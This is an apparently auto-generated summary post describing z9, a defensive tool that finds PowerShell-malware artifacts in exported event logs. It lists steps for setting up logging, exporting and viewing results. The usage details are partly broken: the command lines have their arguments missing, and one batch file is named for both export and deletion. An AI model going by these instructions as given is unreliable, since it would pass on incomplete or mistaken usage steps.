This tools detects the artifact of the PowerShell based malware from the eventlog of PowerShell logging. The JSON file can be visualized by viewer.html.
The z9 PowerShell Log Analyzer is a tool that detects the artifacts of PowerShell-based malware from the eventlog of PowerShell logging. It is available online with a sandbox, and requires Python 3+ to install. To use the tool, users can run the command ‘python z9.py ’ or ‘python z9.py ’. The JSON file can then be visualized with the viewer.html. To prepare the XML file, users must first enable PowerShell logging by right-clicking and merging the registry file, then rebooting the PC. After that, the eventlog can be exported to XML by executing the batch file ‘util/collect_psevent.bat’. The XML files will be created under ‘util/logdirectory’ and can be parsed by the tool. To delete the existing eventlog, users must execute the batch file ‘util/collect_psevent.bat’ with ‘Run as Admin’. The z9 PowerShell Log Analyzer is a useful tool for detecting the artifacts of PowerShell-based malware from the eventlog of PowerShell logging. It is easy to install and use, and provides a comprehensive way to prepare the XML file.
👉🏽 This tools detects the artifact of the PowerShell based malware from the eventlog of PowerShell logging. The JSON file can be visualized by viewer.html. 👉🏽 The z9 PowerShell Log Analyzer detects PowerShell-based malware artifacts from event logs. 👉🏽 It is an online tool that requires Python 3+ for installation. 👉🏽 Users can run the tool by using the command 'python z9.py '. 👉🏽 The tool can also generate an output JSON file for visualization purposes. 👉🏽 The JSON file can be visualized using the viewer.html. 👉🏽 Enabling PowerShell logging is a prerequisite for using the tool. 👉🏽 PowerShell logging can be enabled by merging a registry file and restarting the computer. 👉🏽 The eventlog can be exported to XML using the batch file 'util/collect_psevent.bat'. 👉🏽 XML files are created under 'util/logdirectory' for parsing by the tool. 👉🏽 Existing eventlogs can be deleted by running 'util/collect_psevent.bat' as an administrator.
🔗 source link: https://github.com/Sh1n0g1/z9
🔗 summarized content: https://hut.threathunterz.com/battlefield-intel/tradecraft-tools/sh1n0g1z9
#z9PowerShellLogAnalyzer #PowerShellMalware #Python3+ #VisualizeJSONfile #PrepareXMLfile